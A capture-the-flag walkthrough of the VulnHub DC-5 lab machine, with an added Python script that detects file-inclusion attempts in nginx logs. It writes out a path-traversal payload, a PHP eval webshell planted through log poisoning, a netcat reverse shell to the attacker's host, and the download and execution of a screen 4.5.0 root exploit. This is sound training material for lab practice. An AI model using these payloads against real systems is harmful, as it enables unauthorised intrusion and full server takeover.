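DC Series Target Machine - DC5

I. Environment setup

VM17: download from the official website

Kali 2023.4: https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

Target image: https://download.vulnhub.com/dc/DC-5.zip

II. Steps

First, perform host discovery.

Based on the MAC address, the target's IP is 192.168.20.147.

Next, run a port scan.

Port 80 is open, so try visiting it.

An ordinary page.

Try a directory scan.

A page like this exists.

Try visiting it.

On the contact.php page, the item at the very bottom changes after each submission.

Recalling the footer.php page found earlier, the thankyou.php page may be including footer.php: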

http://192.168.20.147/thankyou.php?file=footer.php

There may be a file inclusion vulnerability here.

Try including /etc/passwd:

http://192.168.20.147/thankyou.php?file=../../../../etc/passwd

Sure enough, the passwd file is returned.

Try to exploit this vulnerability: file inclusion.

Read the nginx error log:

file=../../../../var/log/nginx/error.log

Log contents:

2024/10/17 01:13:37 [error] 560#0: *54419 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou%2ephp HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147"
2024/10/17 01:15:57 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:06 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=2&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:16:34 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:17:53 [error] 559#0: *57817 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=1&lastname=&country=australia&subject= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
2024/10/17 01:32:16 [error] 559#0: *57832 FastCGI sent in stderr: "PHP message: PHP Warning:  include(file=../../../../var/log/nginx/error.log): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
PHP message: PHP Warning:  include(): Failed opening 'file=../../../../var/log/nginx/error.log' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?file=file=../../../../var/log/nginx/error.log HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.20.147", referrer: "http://192.168.20.147/contact.php"
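
The same error-log entries are what a defender would alert on. The Python sketch below is an added example, not part of the original walkthrough: it groups multi-line nginx error-log entries and flags requests whose query values contain directory traversal or a PHP open tag, or that triggered a PHP include() failure. The sample log is constructed in the format shown above, and the names scan, REQ and INCLUDE_FAIL are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the nginx error-log format shown above (entries shortened).
SAMPLE = '''2024/10/17 01:16:06 [error] 559#0: *57807 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined index: file in /var/www/html/thankyou.php on line 41" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?firstname=2&lastname=&country=australia&subject= HTTP/1.1", host: "192.168.20.147"
2024/10/17 01:32:16 [error] 559#0: *57832 FastCGI sent in stderr: "PHP message: PHP Warning:  include(file=../../../../var/log/nginx/error.log): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
PHP message: PHP Warning:  include(): Failed opening 'file=../../../../var/log/nginx/error.log' for inclusion in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?file=file=../../../../var/log/nginx/error.log HTTP/1.1", host: "192.168.20.147"
2024/10/17 01:40:02 [error] 559#0: *57840 FastCGI sent in stderr: "PHP message: PHP Warning:  include(<?php echo 1; ?>): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.20.1, server: _, request: "GET /thankyou.php?file=%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.1", host: "192.168.20.147"
'''

# A PHP warning can span several physical lines, so split only where a timestamp starts.
ENTRY_SPLIT = re.compile(r"\n(?=\d{4}/\d\d/\d\d \d\d:\d\d:\d\d \[)")
REQ = re.compile(r'client: (?P<client>[^,]+),.*?request: "(?P<method>[A-Z]+) (?P<uri>\S*) HTTP/\d\.\d"', re.S)
INCLUDE_FAIL = re.compile(r"PHP Warning:\s+include\(.*?\): failed to open stream")


def scan(text):
    """Return [(client, uri, reasons)] for log entries that look like file-inclusion attempts."""
    hits = []
    for entry in ENTRY_SPLIT.split(text.strip()):
        m = REQ.search(entry)
        if not m:
            continue
        reasons = set()
        if INCLUDE_FAIL.search(entry):
            reasons.add("include-failure")
        # parse_qsl percent-decodes each value once, as PHP does for $_GET.
        for _name, value in parse_qsl(urlsplit(m["uri"]).query, keep_blank_values=True):
            if "../" in value or "..\\" in value:
                reasons.add("path-traversal")
            if "<?" in value:
                reasons.add("php-tag")
        if reasons:
            hits.append((m["client"], m["uri"], sorted(reasons)))
    return hits


if __name__ == "__main__":
    for client, uri, reasons in scan(SAMPLE):
        print(client, ",".join(reasons), uri)
```

A "php-tag" hit on a request whose value is echoed into a log file deserves the highest priority, because that log then contains PHP source that any later inclusion of the file would execute.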

Next, try to upload a webshell:

http://192.168.20.147/thankyou.php?file=<?php @eval($_POST["cmd"]); ?>

Try connecting with AntSword.

AntSword connects successfully.

Connection URL: http://192.168.20.147/thankyou.php?file=../../../../var/log/nginx/error.log
Connection password: cmd

Start a listener on Kali:

nc -lnvp 4444

Spawn a reverse shell and connect back:

nc -nv 192.168.20.151 4444 -c /bin/bash

Upgrade to an interactive shell:

python -c "import pty;pty.spawn('/bin/bash')"

Next, escalate privileges.

Try SUID-based privilege escalation:

find / -perm -4000 2>/dev/null

Use searchsploit (bundled with Kali) to search for known vulnerabilities in screen-4.5.0:

searchsploit screen 4.5.0

searchsploit -m 41154
cp 41154.sh run.sh
dos2unix run.sh

Use Python to start a simple web server:

python -m http.server 5555

Then download the file:

wget -c 192.168.20.151:5555/run.sh

The script downloads successfully.

chmod 777 run.sh
./run.sh

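Root privileges are obtained, and the flag is found in the /root directory.

III. Conclusion

Exploiting the file inclusion vulnerability.

Details of the nc command.

For privilege escalation, first check whether there are known vulnerabilities that can be exploited.

Using Python to set up a simple web server to transfer the script.

The default path of the Nginx log files.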
